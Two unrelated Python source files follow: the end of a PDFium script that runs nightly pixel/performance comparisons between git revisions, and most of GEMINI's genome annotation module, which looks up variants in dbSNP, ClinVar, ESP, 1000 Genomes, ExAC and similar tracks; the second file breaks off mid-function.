pdfium_src_dir = os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir)
os.chdir(pdfium_src_dir)
branch_to_restore = self.git.GetCurrentBranchName()
if not self.args.no_checkout:
self.git.FetchOriginMaster()
self.git.Checkout('origin/master')
# Make sure results dir exists
if not os.path.exists(self.context.results_dir):
os.makedirs(self.context.results_dir)
if not os.path.exists(self.context.last_revision_covered_file):
result = self._InitialRun()
else:
with open(self.context.last_revision_covered_file) as f:
last_revision_covered = f.read().strip()
result = self._IncrementalRun(last_revision_covered)
self.git.Checkout(branch_to_restore)
return result
def _InitialRun(self):
"""Initial run, just write a checkpoint.
Returns:
Exit code for the script.
"""
current = self.git.GetCurrentBranchHash()
PrintWithTime('Initial run, current is %s' % current)
self._WriteCheckpoint(current)
PrintWithTime('All set up, next runs will be incremental and perform '
'comparisons')
return 0
def _IncrementalRun(self, last_revision_covered):
"""Incremental run, compare against last checkpoint and update it.
Args:
last_revision_covered: String with hash for last checkpoint.
Returns:
Exit code for the script.
"""
current = self.git.GetCurrentBranchHash()
PrintWithTime('Incremental run, current is %s, last is %s' %
(current, last_revision_covered))
if not os.path.exists(self.context.run_output_dir):
os.makedirs(self.context.run_output_dir)
if current == last_revision_covered:
PrintWithTime('No changes seen, finishing job')
output_info = {
'metadata':
self._BuildRunMetadata(last_revision_covered, current, False)
}
self._WriteRawJson(output_info)
return 0
# Run compare
cmd = [
'testing/tools/safetynet_compare.py', '--this-repo',
'--machine-readable',
'--branch-before=%s' % last_revision_covered,
'--output-dir=%s' % self.context.run_output_dir
]
cmd.extend(self.args.input_paths)
json_output = RunCommandPropagateErr(cmd)
if json_output is None:
return 1
output_info = json.loads(json_output)
run_metadata = self._BuildRunMetadata(last_revision_covered, current, True)
output_info.setdefault('metadata', {}).update(run_metadata)
self._WriteRawJson(output_info)
PrintConclusionsDictHumanReadable(
output_info,
colored=(not self.args.output_to_log and not self.args.no_color),
key='after')
status = 0
if output_info['summary']['improvement']:
PrintWithTime('Improvement detected.')
status = 4
if output_info['summary']['regression']:
PrintWithTime('Regression detected.')
status = 3
if status == 0:
PrintWithTime('Nothing detected.')
self._WriteCheckpoint(current)
return status
def _WriteRawJson(self, output_info):
json_output_file = os.path.join(self.context.run_output_dir, 'raw.json')
with open(json_output_file, 'w') as f:
json.dump(output_info, f)
def _BuildRunMetadata(self, revision_before, revision_after,
comparison_performed):
return {
'datetime': self.context.datetime,
'revision_before': revision_before,
'revision_after': revision_after,
'comparison_performed': comparison_performed,
}
def _WriteCheckpoint(self, checkpoint):
if not self.args.no_checkpoint:
with open(self.context.last_revision_covered_file, 'w') as f:
f.write(checkpoint + '\n')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('results_dir', help='where to write the job results')
parser.add_argument(
'input_paths',
nargs='+',
help='pdf files or directories to search for pdf files '
'to run as test cases')
parser.add_argument(
'--no-checkout',
action='store_true',
help='whether to skip checking out origin/master. Use '
'for script debugging.')
parser.add_argument(
'--no-checkpoint',
action='store_true',
help='whether to skip writing the new checkpoint. Use '
'for script debugging.')
parser.add_argument(
'--no-color',
action='store_true',
help='whether to write output without color escape '
'codes.')
parser.add_argument(
'--output-to-log',
action='store_true',
help='whether to write output to a log file')
args = parser.parse_args()
job_context = JobContext(args)
if args.output_to_log:
log_file = open(job_context.run_output_log_file, 'w')
sys.stdout = log_file
sys.stderr = log_file
run = JobRun(args, job_context)
result = run.Run()
if args.output_to_log:
log_file.close()
return result
if __name__ == '__main__':
sys.exit(main())
|
|
#!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.b141.20140813.hg19.tidy.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20150305.tidy.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.tidy.v2.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.autosomes.phase3_shapeit2_mvncall_integrated_v5.20130502.sites.tidy.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'fitcons': os.path.join(anno_dirname, "hg19_fitcons_fc-i6-0_V1-01.bed.gz"),
'cosmic': os.path.join(anno_dirname, 'cosmic-v68-GRCh37.tidy.vcf.gz'),
'exac': os.path.join(anno_dirname, 'ExAC.r0.3.sites.vep.tidy.vcf.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.clinvar_causal_allele = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
# 0 - Uncertain significance, 1 - not provided, 2 - Benign, 3 - Likely benign, 4 - Likely pathogenic, 5 - Pathogenic, 6 - drug response, 7 - histocompatibility, 255 - other
self.sig_code_map = {'0': 'uncertain',
'1': 'not-provided',
'2': 'benign',
'3': 'likely-benign',
'4': 'likely-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay),
str(self.clinvar_causal_allele)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
sigs = []
for s in sig_code.split('|'):
sigs.extend(s.split(","))
return ",".join(self.sig_code_map[s] for s in set(sigs) if s != ".")
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_EAS \
aaf_SAS \
aaf_AFR \
aaf_EUR")
GmsTechs = collections.namedtuple("GmsTechs", "illumina solid iontorrent")
ExacInfo = collections.namedtuple("ExacInfo",
"found \
aaf_ALL \
adj_aaf_ALL \
aaf_AFR \
aaf_AMR \
aaf_EAS \
aaf_FIN \
aaf_NFE \
aaf_OTH \
aaf_SAS")
def load_annos(args):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files(args)
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile(open(anno_files[anno]))
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
PARSERS = {"bed": pysam.asBed(),
"vcf": pysam.asVCF(),
"tuple": pysam.asTuple(),
None: None}
def _get_hits(coords, annotation, parser_type, _parsers=PARSERS):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
try:
parser = _parsers[parser_type]
except KeyError:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_var_ref_and_alt(var):
"""Retrieve variant reference and alternate alleles from multiple input objects.
"""
if isinstance(var, basestring):
# Assume var is a line from a VCF.
ref, alt = var.split('\t')[3:5]
elif isinstance(var, dict) or isinstance(var, sqlite3.Row):
ref = var["ref"]
alt = var["alt"]
else:
try:
ref = var.REF
alt = var.ALT
except KeyError:
# For Pysam reader:
ref = var.ref
alt = var.alt
if isinstance(alt, basestring):
alt = alt.split(",")
return ref, alt
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
def annotations_in_vcf(var, anno, parser_type=None, naming="ucsc", region_only=False, warnings=False):
"""Iterator of annotations found in a VCF. For variants with multiple alleles,
match using intersection and warn that decomposition, etc. is recommended.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
- region_only: match using only region coordinates, not variant reference
and alternate; only used for VCF annotations
"""
# Get hits by region only.
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
hits = _get_hits(coords, anno, parser_type)
# Now filter by allele.
if not region_only:
def multiallele_warning(chrom, start, alt, is_annotation):
"""
Print warnings for multi-allelic sites and recommend decomposition, etc.
"""
# Check for multiple alleles and warnings flag.
if not warnings:
return
if len(alt) == 1 or isinstance(alt, basestring):
return
variant_text = 'variant'
if is_annotation:
variant_text = 'annotation variant'
sys.stderr.write("warning: %s with multiple alternate alleles found at %s:%i (alt: %s)\n"
"in order to reduce the number of false negatives we recommend splitting multiple alts. see:\n"
"http://gemini.readthedocs.org/en/latest/content/preprocessing.html#preprocess\n"
% (variant_text, chrom, start, ','.join(alt)))
# Get variant ref, alt.
var_ref, var_alt = _get_var_ref_and_alt(var)
var_alt = set(var_alt)
# Warn for multiple alleles.
chrom, start, end = coords
multiallele_warning(chrom, start, ','.join(var_alt), False)
# Filter hits to those that match ref and alt.
matched_hits = []
for h in hits:
# Get annotation fields.
anno_ref, anno_alt = _get_var_ref_and_alt(h)
anno_alt = set(anno_alt)
# Warn for multiple alleles.
if isinstance(h, basestring):
start = int(h.split('\t', 2)[1])
else:
# Assume it's a Pysam entry.
start = h.pos
multiallele_warning(chrom, start - 1, anno_alt, True)
# Match via ref and set intersection of alternates.
# the mappability uses "." as the alt for all rows. so
if var_ref == anno_ref and (len(var_alt & anno_alt) >= 1 \
or anno_alt == set(".")):
matched_hits.append(h)
hits = matched_hits
return hits
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_fitcons(var):
hmax = None
for hit in annotations_in_region(var, "fitcons", None, "ucsc"):
_, val = hit.rsplit("\t", 1)
v = float(val)
if v > hmax:
hmax = v
return hmax
def get_cadd_scores(var):
"""
Returns the C-raw scores & scaled scores (CADD) to predict deleterious
variants. Implemented only for SNV's
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and var.REF and var.ALT[0] and \
len(var.REF) == 1 and len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
# report the first overlapping ClinVar variant Most often, just one).
cosmic_ids = []
for hit in annotations_in_vcf(var, "cosmic", "vcf", "grch37"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
# clinvar_causal_allele = CLNALLE=1
"""
clinvar = ClinVarInfo()
# report the first overlapping ClinVar variant Most often, just one).
for hit in annotations_in_vcf(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
causal_allele_numbers = [x for x in info_map['CLNALLE'].split(',') if x
!= '.'] # CLNALLE=0,1 or CLNALLE=0 or CLNALLE=1
if len(causal_allele_numbers) == 1:
causal_allele_number = int(causal_allele_numbers[0])
if causal_allele_number == -1 or causal_allele_number is None:
clinvar.clinvar_causal_allele = None
elif causal_allele_number == 0:
clinvar.clinvar_causal_allele = hit.ref
elif causal_allele_number > 0:
# alt should alwasy be length 1 if they decomposed, but just in
# case ...
clinvar.clinvar_causal_allele = hit.alt.split(',')[causal_allele_number - 1]
else:
clinvar_causal_allele = ""
for idx, allele_num in enumerate(causal_allele_numbers):
causal_allele_number = int(allele_num)
if idx > 0:
clinvar_causal_allele += ","
if causal_allele_number == 0:
clinvar_causal_allele += hit.ref
elif causal_allele_number > 0:
clinvar_causal_allele += hit.alt.split(',')[causal_allele_number - 1]
clinvar.clinvar_causal_allele = clinvar_causal_allele
return clinvar
def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_vcf(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
out whther the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
fetched = []
exome_chip = False
found = False
info_map = {}
acs = {}
for hit in annotations_in_vcf(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
for info in hit.info.split(";"):
if info.find("=") > 0:
# splits on first occurence of '='
# useful to handle valuerror: too many values to unpack (e.g (a,b) = split(",", (a,b,c,d)) for cases like
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
# NOTE:, if we start ot use GTS, need to update preprocessing
# script to handle weirdness on X, Y
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
for key in ('EA_AC', 'AA_AC', 'TAC'):
if info_map.get(key) is not None:
lines = info_map[key].split(",")
denom = float(lines[0]) + float(lines[1])
if denom == 0:
acs[key] = 0
else:
# alt allele is stored as 2nd.
acs[key] = float(lines[1]) / denom
# Is the SNP on an human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
break
return ESPInfo(found, acs.get('EA_AC'), acs.get("AA_AC"), acs.get("TAC"), exome_chip)
EMPTY_1000G = ThousandGInfo(False, None, None, None, None, None, None)
def get_1000G_info(var, empty=EMPTY_1000G):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
for hit in annotations_in_vcf(var, "1000g", "vcf", "grch37"):
# We need to ensure we are dealing with the exact sample variant
# based on position and the alleles present.
# var.start is used since the chromosomal pos in pysam.asVCF is zero based (hit.pos)
# and would be equivalent to (POS-1) i.e. var.start
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if "=" in info:
(key, value) = info.split("=", 1)
info_map[key] = value
return ThousandGInfo(True, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('EAS_AF'), info_map.get('SAS_AF'),
info_map.get('AFR_AF'), info_map.get('EUR_AF'))
return empty
EXAC_EMTPY = ExacInfo(False, None, None, None, None, None,
None, None, None, None)
def get_exac_info(var, empty=EXAC_EMTPY):
"""
Returns the allele frequencies from the Exac data (Broad)
"""
info_map = {}
afs = {}
for hit in annotations_in_vcf(var,"exac", "vcf", "grch37"):
# Does not handle anything beyond var.ALT[0] in the VCF (in case of multi-allelic variants)
# var.start is used since the chromosomal pos in pysam.asVCF is zero based (hit.pos)
# and would be equivalent to (POS-1) i.e var.start
if not (var.start == hit.pos and var.REF == hit.ref):
continue
# This would look for var.ALT[0] matches to
# any of the multiple alt alleles represented in the EXAC file
ALT = hit.alt.split(",")
for allele_num, each in enumerate(ALT):
if each != var.ALT[0]:
continue
# Store the allele index of the match to retrieve the right frequencies
for info in hit.info.split(";"):
if "=" in info:
(key, value) = info.split("=", 1)
info_map[key] = value
# Population independent raw (non-adjusted) allele frequencies given by AF
if info_map.get('AF') is not None:
aaf_ALL = info_map['AF'].split(",")[allele_num]
else:
aaf_ALL = None
for grp in ('Adj', 'AFR', 'AMR', 'EAS', 'FIN', 'NFE', 'OTH', 'SAS'):
ac = info_map.get('AC_%s' % grp)
if ac is None: continue
an = info_map.get('AN_%s' % grp)
if an is None: continue
if an == '0':
afs[grp] = 0
continue
ac_list = ac.split(",")
afs[grp] = float(ac_list[allele_num]) / float(an)
return ExacInfo(True, aaf_ALL, afs['Adj'], afs['AFR'], afs['AMR'],
afs['EAS'], afs['FIN'], afs['NFE'], afs['OTH'], afs['SAS'])
return empty
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
hit = _get_first_vcf_hit(
